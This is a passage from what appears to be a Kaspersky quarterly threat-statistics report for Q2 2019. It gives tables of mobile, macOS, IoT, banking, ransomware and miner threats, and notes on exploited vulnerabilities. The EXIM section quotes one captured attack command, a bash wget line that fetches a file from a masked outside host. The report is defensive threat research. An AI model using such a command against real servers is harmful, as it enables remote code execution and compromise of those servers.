Trojan-Banker.AndroidOS.Agent.eq | 3.81 \n10 | Trojan-Banker.AndroidOS.Faketoken.z | 3.13 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile antivirus that were attacked by banking threats._\n\nAlmost half our Top 10 mobile bankers in Q2 2019 is made up of modifications of the Trojan-Banker.AndroidOS.Asacub Trojan: four positions out of ten. However, this family's distribution bursts that we registered last quarter were not repeated this time.\n\nAs in Q1, Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep made it into the Top 10; however, they ceded the highest positions to the Svpeng family of Trojans, which is considered one of the longest in existence.\n\n_Geography of mobile banking threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153417/it-threat-evolution-q2-2019-statistics-7.png>)\n\n#### Top 10 countries by share of users attacked by mobile banking Trojans:\n\n| Country* | %** \n---|---|--- \n1 | South Africa | 0.64% \n2 | Russia | 0.31% \n3 | Tajikistan | 0.21% \n4 | Australia | 0.17% \n5 | Turkey | 0.17% \n6 | Ukraine | 0.13% \n7 | Uzbekistan | 0.11% \n8 | Korea | 0.11% \n9 | Armenia | 0.10% \n10 | India | 0.10% \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nIn Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.\n\nSecond place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).\n\nThird place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.\n\n### Mobile ransomware Trojans\n\nIn Q2 2019, we detected **23,294** installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.\n\n_Number of installation packages for mobile banking Trojans, Q3 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153440/it-threat-evolution-q2-2019-statistics-8.png>)\n\n#### Top 10 mobile ransomware Trojans\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.aj | 43.90 \n2 | Trojan-Ransom.AndroidOS.Rkor.i | 11.26 \n3 | Trojan-Ransom.AndroidOS.Rkor.h | 7.81 \n4 | Trojan-Ransom.AndroidOS.Small.as | 6.41 \n5 | Trojan-Ransom.AndroidOS.Svpeng.ah | 5.92 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 3.35 \n7 | Trojan-Ransom.AndroidOS.Fusob.h | 2.48 \n8 | Trojan-Ransom.AndroidOS.Small.o | 2.46 \n9 | Trojan-Ransom.AndroidOS.Pigetrl.a | 2.45 \n10 | Trojan-Ransom.AndroidOS.Small.ce | 2.22 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans._\n\nIn Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.\n\n_Geography of mobile ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153507/it-threat-evolution-q2-2019-statistics-9.png>)\n\n#### Top 10 countries by share of users attacked by mobile ransomware Trojans:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.58 \n2 | Kazakhstan | 0.39 \n3 | Iran | 0.27 \n4 | Pakistan | 0.16 \n5 | Saudi Arabia | 0.10 \n6 | Mexico | 0.09 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Singapore | 0.05 \n10 | Indonesia | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)_ \n_** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country._\n\nThe leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)\n\n## Attacks on Apple macOS\n\nQ2 witnessed several interesting events, three of which deserve special attention.\n\nA [vulnerability](<https://www.fcvl.net/vulnerabilities/macosx-gatekeeper-bypass>) was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.\n\nVulnerabilities detected in the Firefox browser ([CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>), [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>)) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.\n\nAlso an interesting vector for delivering a malicious miner to victims was [discovered](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>). The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish \u2013 both QEMU and the miner consume significant resources \u2013 that such a Trojan could not remain unnoticed for long.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.61 \n2 | AdWare.OSX.Spc.a | 12.75 \n3 | AdWare.OSX.Bnodlero.t | 11.98 \n4 | AdWare.OSX.Pirrit.j | 11.27 \n5 | AdWare.OSX.Pirrit.p | 8.42 \n6 | AdWare.OSX.Pirrit.s | 7.76 \n7 | AdWare.OSX.Pirrit.o | 7.59 \n8 | AdWare.OSX.MacSearch.a | 5.92 \n9 | AdWare.OSX.Cimpli.d | 5.76 \n10 | AdWare.OSX.Mcp.a | 5.39 \n11 | AdWare.OSX.Agent.b | 5.11 \n12 | AdWare.OSX.Pirrit.q | 4.31 \n13 | AdWare.OSX.Bnodlero.v | 4.02 \n14 | AdWare.OSX.Bnodlero.q | 3.70 \n15 | AdWare.OSX.MacSearch.d | 3.66 \n16 | Downloader.OSX.InstallCore.ab | 3.58 \n17 | AdWare.OSX.Geonei.as | 3.48 \n18 | AdWare.OSX.Amc.a | 3.29 \n19 | AdWare.OSX.Agent.c | 2.93 \n20 | AdWare.OSX.Mhp.a | 2.90 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked._\n\nOn the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.11 \n2 | Spain | 9.68 \n3 | India | 8.84 \n4 | US | 8.49 \n5 | Canada | 8.35 \n6 | Russia | 8.01 \n7 | Italy | 7.74 \n8 | UK | 7.47 \n9 | Mexico | 7.08 \n10 | Brazil | 6.85 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)_ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.\n\nIn the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.\n\n## IoT attacks\n\n### Interesting events\n\nIn the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new [vulnerability](<https://www.exim.org/static/doc/security/CVE-2019-10149.txt>) in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153528/it-threat-evolution-q2-2019-statistics-10.png>)\n\n_Intercepted attack traffic_\n\nThe screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows: \n \n \n /bin/bash -c \"wget X.X.X.X/exm -O /dev/null\n\n### IoT threat statistics\n\nQ2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH. \n \nSSH | 40.43% \nTelnet | 59.57% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019_\n\nHowever, in terms of number of sessions involving Kaspersky Lab [honeypots](<https://encyclopedia.kaspersky.com/glossary/honeypot-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), we see a decline for SSH from 64% in Q1 to 49.6% in Q2. \n \nSSH | 49.59% \nTelnet | 50.41% \n \n_Distribution of cybercriminals' working sessions with Kaspersky Lab traps, Q2 2019_\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153555/it-threat-evolution-q2-2019-statistics-11.png>)\n\n#### **Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps**\n\n| Country | % \n---|---|--- \n1 | Egypt | 15.06 \n2 | China | 12.27 \n3 | Brazil | 10.24 \n4 | US | 5.23 \n5 | Russia | 5.03 \n6 | Greece | 4.54 \n7 | Iran | 4.06 \n8 | Taiwan | 3.15 \n9 | India | 3.04 \n10 | Turkey | 2.90 \n \nFor the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.\n\nTelnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.\n\n#### **Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks **\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.92 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 26.48 \n3 | Backdoor.Linux.Mirai.ba | 26.48 \n4 | Backdoor.Linux.Mirai.au | 15.75 \n5 | Backdoor.Linux.Gafgyt.bj | 2.70 \n6 | Backdoor.Linux.Mirai.ad | 2.57 \n7 | Backdoor.Linux.Gafgyt.az | 2.45 \n8 | Backdoor.Linux.Mirai.h | 1.38 \n9 | Backdoor.Linux.Mirai.c | 1.36 \n10 | Backdoor.Linux.Gafgyt.av | 1.26 \n \n_* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks_\n\nAs things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153622/it-threat-evolution-q2-2019-statistics-12.png>)\n\n#### **Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps**\n\n| Country | % \n---|---|--- \n1 | Vietnam | 15.85 \n2 | China | 14.51 \n3 | Egypt | 12.17 \n4 | Brazil | 6.91 \n5 | Russia | 6.66 \n6 | US | 5.05 \n7 | Thailand | 3.76 \n8 | Azerbaijan | 3.62 \n9 | India | 2.43 \n10 | France | 2.12 \n \nIn Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.\n\n_Number of unique users attacked by financial malware, Q2 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153645/it-threat-evolution-q2-2019-statistics-13.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153713/it-threat-evolution-q2-2019-statistics-14.png>)\n\n#### Top 10 countries by share of attacked users\n\n| **Country*** | **%**** \n---|---|--- \n1 | Belarus | 2.0 \n2 | Venezuela | 1.8 \n3 | China | 1.6 \n4 | Indonesia | 1.3 \n5 | South Korea | 1.3 \n6 | Cyprus | 1.2 \n7 | Paraguay | 1.2 \n8 | Russia | 1.2 \n9 | Cameroon | 1.1 \n10 | Serbia | 1.1 \n \n_* Excluded are countries with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n#### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 32.2 | \n2 | Zbot | Trojan.Win32.Zbot | 23.3 | \n3 | Emotet | Backdoor.Win32.Emotet | 8.2 | \n4 | Nimnul | Virus.Win32.Nimnul | 6.4 | \n5 | Trickster | Trojan.Win32.Trickster | 5.0 | \n6 | Nymaim | Trojan.Win32.Nymaim | 3.5 | \n7 | SpyEye | Backdoor.Win32.SpyEye | 3.2 | \n8 | Neurevt | Trojan.Win32.Neurevt | 2.8 | \n9 | IcedID | Trojan-Banker.Win32.IcedID | 1.2 | \n10 | Gozi | Trojan.Win32.Gozi | 1.1 | \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&amp;C servers, and by early Q3 almost all the C&amp;C botnets were unavailable.\n\nWe also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.\n\n## Ransomware programs\n\n### Quarterly highlights\n\nAfter almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was [shutting down the operation](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>). According to our reports, it was one of the most common ransomware encryptors.\n\nIn Q2, distribution got underway of the new [Sodin](<https://securelist.com/sodin-ransomware/91473/>) ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.\n\nAlso this quarter, there were a few high-profile ransomware infections in the computer networks of [city](<https://threatpost.com/ransomware-florida-city-pays-600k-ransom/145869/>) [administrations](<https://threatpost.com/second-florida-city-pays-hackers-500k-post-ransomware-attack/146018/>). This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.\n\n### Number of new modifications\n\nIn Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.\n\n_Number of new ransomware modifications, Q2 2018 \u2013 Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153736/it-threat-evolution-q2-2019-statistics-15.png>)\n\nThe majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware \u2013 it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim's data inside them in encrypted form.\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153800/it-threat-evolution-q2-2019-statistics-16.png>)\n\nThe busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153826/it-threat-evolution-q2-2019-statistics-17.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by ransomware**** \n---|---|--- \n1 | Bangladesh | 8.81% \n2 | Uzbekistan | 5.52% \n3 | Mozambique | 4.15% \n4 | Ethiopia | 2.42% \n5 | Nepal | 2.26% \n6 | Afghanistan | 1.50% \n7 | China | 1.18% \n8 | Ghana | 1.17% \n9 | Korea | 1.07% \n10 | Kazakhstan | 1.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdict*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 23.37% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.73% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 13.83% | \n4 | (generic verdict) | Trojan-Ransom.Win32.Gen | 7.41% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 4.73% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 4.15% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.75% | \n8 | PolyRansom/VirLock | Virus.Win32.PolyRansom \nTrojan-Ransom.Win32.PolyRansom | 2.45% | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.31% | \n10 | Cryakl | Trojan-Ransom.Win32.Cryakl | 1.24% | \n| | | | | \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new modifications\n\nIn Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.\n\n_Number of new miner modifications, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153850/it-threat-evolution-q2-2019-statistics-18.png>)\n\nThe largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.\n\n_Number of unique users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153917/it-threat-evolution-q2-2019-statistics-19.png>)\n\nThroughout the quarter, the number of attacked users gradually decreased \u2013 from 383,000 in April to 318,000 in June.\n\n### Attack geography\n\n_Geographical spread of countries by share of users attacked by miners, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16153944/it-threat-evolution-q2-2019-statistics-20.png>)\n\n**Top 10 countries by share of users attacked by miners**\n\n| **Country*** | **% of users attacked by miners**** \n---|---|--- \n1 | Afghanistan | 10.77% \n2 | Ethiopia | 8.99% \n3 | Uzbekistan | 6.83% \n4 | Kazakhstan | 4.76% \n5 | Tanzania | 4.66% \n6 | Vietnam | 4.28% \n7 | Mozambique | 3.97% \n8 | Ukraine | 3.08% \n9 | Belarus | 3.06% \n10 | Mongolia | 3.06% \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by cybercriminals during cyber attacks\n\nOver the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception \u2013 the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>), and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>) and [CVE-2017-8759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) are also popular with cybercriminals.\n\nThe increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154007/it-threat-evolution-q2-2019-statistics-21.png>)\n\nThe share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of [Coinbase](<https://www.zdnet.com/article/firefox-zero-day-was-used-in-attack-against-coinbase-employees-not-its-users/>) and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, [CVE-2019-11707](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-18/>) and [CVE-2019-11708](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-19/>), for remote code execution in Mozilla Firefox.\n\nOn the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: [CVE-2019-1069](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1069>), [CVE-2019-0863](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0863>), [CVE-2019-0841](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0841>), and [CVE-2019-0973](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0973>).\n\nThe share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as [Oracle WebLogic](<https://securelist.com/sodin-ransomware/91473/>). A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the [CVE-2019-0708](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the [WannaCry ransomware](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>). Insufficient scanning of incoming packets allows an attacker to implement a use-after-free script and overwrite data in the kernel memory. Note that exploitation of this attack does not require access to a remote account, as it takes place at the authorization stage before the username and password are checked.\n\n### Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n#### Countries that are sources of web-based attacks: Top 10\n\n_The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn Q2 2019, Kaspersky solutions defeated **717,057,912** attacks launched from online resources located in 203 countries across the globe. **217,843,293** unique URLs triggered Web Anti-Virus components.\n\n_Distribution of web-based attack sources by country, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154032/it-threat-evolution-q2-2019-statistics-22.png>)\n\nThis quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.\n\n#### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Algeria | 20.38 \n2 | Venezuela | 19.13 \n3 | Albania | 18.30 \n4 | Greece | 17.36 \n5 | Moldova | 17.30 \n6 | Bangladesh | 16.82 \n7 | Estonia | 16.68 \n8 | Azerbaijan | 16.59 \n9 | Belarus | 16.46 \n10 | Ukraine | 16.18 \n11 | France | 15.84 \n12 | Philippines | 15.46 \n13 | Armenia | 15.40 \n14 | Tunisia | 15.29 \n15 | Bulgaria | 14.73 \n16 | Poland | 14.69 \n17 | R\u00e9union | 14.68 \n18 | Latvia | 14.65 \n19 | Peru | 14.50 \n20 | Qatar | 14.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country._\n\n_These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data._\n\nOn average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.\n\n_Geography of malicious web-based attacks, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154059/it-threat-evolution-q2-2019-statistics-23.png>)\n\n### Local threats\n\n_Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q2 2019, our File Anti-Virus detected **240,754,063** malicious and potentially unwanted objects.\n\n#### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that as of this quarter, the rating includes only **Malware-class** attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Afghanistan | 55.43 \n2 | Tajikistan | 55.27 \n3 | Uzbekistan | 55.03 \n4 | Yemen | 52.12 \n5 | Turkmenistan | 50.75 \n6 | Laos | 46.12 \n7 | Syria | 46.00 \n8 | Myanmar | 45.61 \n9 | Mongolia | 45.59 \n10 | Ethiopia | 44.95 \n11 | Bangladesh | 44.11 \n12 | Iraq | 43.79 \n13 | China | 43.60 \n14 | Bolivia | 43.47 \n15 | Vietnam | 43.22 \n16 | Venezuela | 42.71 \n17 | Algeria | 42.33 \n18 | Cuba | 42.31 \n19 | Mozambique | 42.14 \n20 | Rwanda | 42.02 \n \n_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives._\n\n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local threats, Q2 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/08/16154126/it-threat-evolution-q2-2019-statistics-24.png>)\n\nOverall, 22.35% of user computers globally faced at least one **Malware-class** local threat during Q2.\n\nThe figure for Russia was 26.14%.", "modified": "2019-08-19T10:00:00", "published": "2019-08-19T10:00:00", "id": "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "href": "https://securelist.com/it-threat-evolution-q2-2019-statistics/92053/", "type": "securelist", "title": "IT threat evolution Q2 2019. Statistics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}